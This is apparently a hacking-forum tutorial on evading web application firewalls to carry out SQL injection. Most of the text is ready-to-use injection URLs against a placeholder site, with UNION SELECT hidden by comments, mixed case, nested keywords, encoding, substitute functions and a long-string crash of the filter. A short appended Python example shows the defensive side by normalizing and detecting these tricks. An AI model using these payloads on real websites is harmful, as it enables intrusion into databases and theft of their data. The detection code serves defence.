Today I'm going to show you how to bypass web application firewalls (WAF).
Let's begin!
How to know if there is a web application firewall?
This is pretty simple! When you try to enter a command used for SQL injection (usually the "UNION SELECT" command), you get a 403 error (and the website says "Forbidden" or "Not Acceptable").
Example:
Code: http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4,5....
(We get a 403 error)
Basic/simple methods:
First, of course, we need to know the basic methods to bypass a WAF....
1) Comments:
You can use comments to bypass the WAF:
Code: http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT 1,2,3,4,5...
(First method that can bypass a WAF)
However, most WAFs identify this method, so they still show a "Forbidden" error.
2) Change the case of letters:
You can also change the case of the command:
Code: http://www.site.com/index.php?page_id=-15 UnIoN SeLEcT 1,2,3,4,5...
(Another basic method to bypass a WAF!)
However, as before, this trick is also detected by most WAFs!
3) Combine the previous methods:
What you can also do is combine the previous two methods:
Code: http://www.site.com/index.php?page_id=-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5....
This method is not detected by many web application firewalls!
4) Replaced keywords:
Some firewalls remove the "UNION SELECT" statement when it is found in the URL. We can do this to exploit that function:
Code: http://www.site.com/index.php?page_id=-15 UNIunionON SELsectECT 1,2,3,4,5...
(The "union" and the "select" will be removed, so the final result will be "UNION SELECT")
This method doesn't work on all firewalls, as only some of them remove the "UNION" and "SELECT" commands when they are detected!
5) Inline comments:
Some firewalls get bypassed by inserting inline comments between the "union" and the "select" commands:
Code: http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4,5..
(The U is equal to "U" and the S to "S". See more in the advanced section...)
I believe that these are the most basic methods of WAF bypassing! Let's move on to more advanced ones...
Advanced methods:
Now that you have learned about basic WAF bypassing, I think it is good to understand more advanced methods!
1) Buffer overflow / firewall crash:
Many firewalls are developed in C/C++, and we can crash them using a buffer overflow!
Code: http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn**/+/*!SeLECt*/+1,2,3,4,5....
(You can test whether the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn//*yoyu*/all/**/
/*!SeLEct*/
/*nna*/+1,2,3,4,5...
If you get a 500, you can exploit it using the buffer overflow method!)
2) Replace characters with their hex values:
We can replace some characters with their hex (URL-encoded) values.
Example:
Code: http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4,5...
(Which means "UNION SELECT")
Text to hex encoder (choose the "Hex Encoded for URL" result!): http://www.swingnote.com/tools/texttohex.php
3) Use other variables/commands instead of the common ones for SQLi:
Apart from "UNION SELECT", other commands might be blocked.
Commonly blocked commands:
Code:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gdVEeiDU
group_concat() | concat_ws()
[!]-> You can also try to SQL inject with the NAME_CONST method: http://is.gd/o10i0d (created by DOWNFALL)
Learning MySQL really helps with such issues!
4) Misc exploitable functions:
Many firewalls try to offer more protection by adding prototype or strange functions (which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with whitespace! What we can do is this:
Code: http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4,5....
(If the firewall removes the "*", the result will be: 15+union+select...)
So if you find such a silly function, you can exploit it in this way!
[+] In addition to the previous example, some other bypasses might be:
Code:
-15+(uNioN+(sElECt)...
-15+uNioN+SeleCT)+...
-15+(UnI(oN)+(SeL)(ecT)+..
-15+union (select 1,2,3,4,5...
-15+/*!50000UNION*/+SELECT+1,2,3,4,5...
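Every method above works because the filter matches the raw URL while the database sees something else. A filter that decodes and normalizes the parameter first catches the comment, case and encoding tricks in one place, and a filter that rejects the request instead of stripping keywords is not fooled by method 4. The following is an added example written for this post (not code from the author or from any WAF product); the sample values and function names are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values of the page_id parameter, modelled on the
# obfuscations described above (not taken from any real traffic).
SAMPLES = {
    "plain":             "-15 UNION SELECT 1,2,3,4,5",
    "versioned_comment": "-15 /*!UnIoN*/ /*!SeLecT*/ 1,2,3,4,5",
    "inline_comment":    "-15 UnION/**/SElecT 1,2,3,4,5",
    "version_number":    "-15+/*!50000UNION*/+SELECT+1,2,3,4,5",
    "url_encoded":       "-15+%2F%2A%21union%2A%2F+%2F%2A%21select%2A%2F+1,2,3",
    "benign":            "15",
}

# MySQL executes the body of /*!...*/ and /*!NNNNN...*/ comments, so their
# body is kept; an ordinary /*...*/ comment is dropped and becomes a space.
_COMMENT_RE = re.compile(r"/\*!\d{0,5}(.*?)\*/|/\*.*?\*/", re.S)
_UNION_SELECT_RE = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")


def normalize(value: str) -> str:
    """Reduce a parameter to roughly what the database engine would see."""
    decoded = unquote_plus(value)  # %2F -> '/', '+' -> ' '
    uncommented = _COMMENT_RE.sub(
        lambda m: m.group(1) if m.group(1) is not None else " ", decoded)
    return re.sub(r"\s+", " ", uncommented).strip().lower()


def looks_like_union_select(value: str) -> bool:
    """Match UNION SELECT on the normalized form, not on the raw string."""
    return _UNION_SELECT_RE.search(normalize(value)) is not None


def naive_strip_keywords(value: str) -> str:
    """Single-pass keyword removal: the filter behaviour method 4 abuses."""
    return re.sub(r"union|select", "", value, flags=re.I)


def strip_keywords_to_fixpoint(value: str) -> str:
    """Repeat removal until nothing changes, so a nested keyword cannot survive.
    Rejecting the request outright is still the safer default."""
    prev = None
    while prev != value:
        prev, value = value, re.sub(r"union|select", "", value, flags=re.I)
    return value


if __name__ == "__main__":
    for name, v in SAMPLES.items():
        print(f"{name:18} -> {looks_like_union_select(v)}")
    stuffed = "UNIunionON SELselectECT"        # constructed method-4 input
    print(repr(naive_strip_keywords(stuffed)))       # 'UNION SELECT'
    print(repr(strip_keywords_to_fixpoint(stuffed)))  # only whitespace left
```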
Team: AnonDevilz
Member/Hacker: Xyb3r D3vil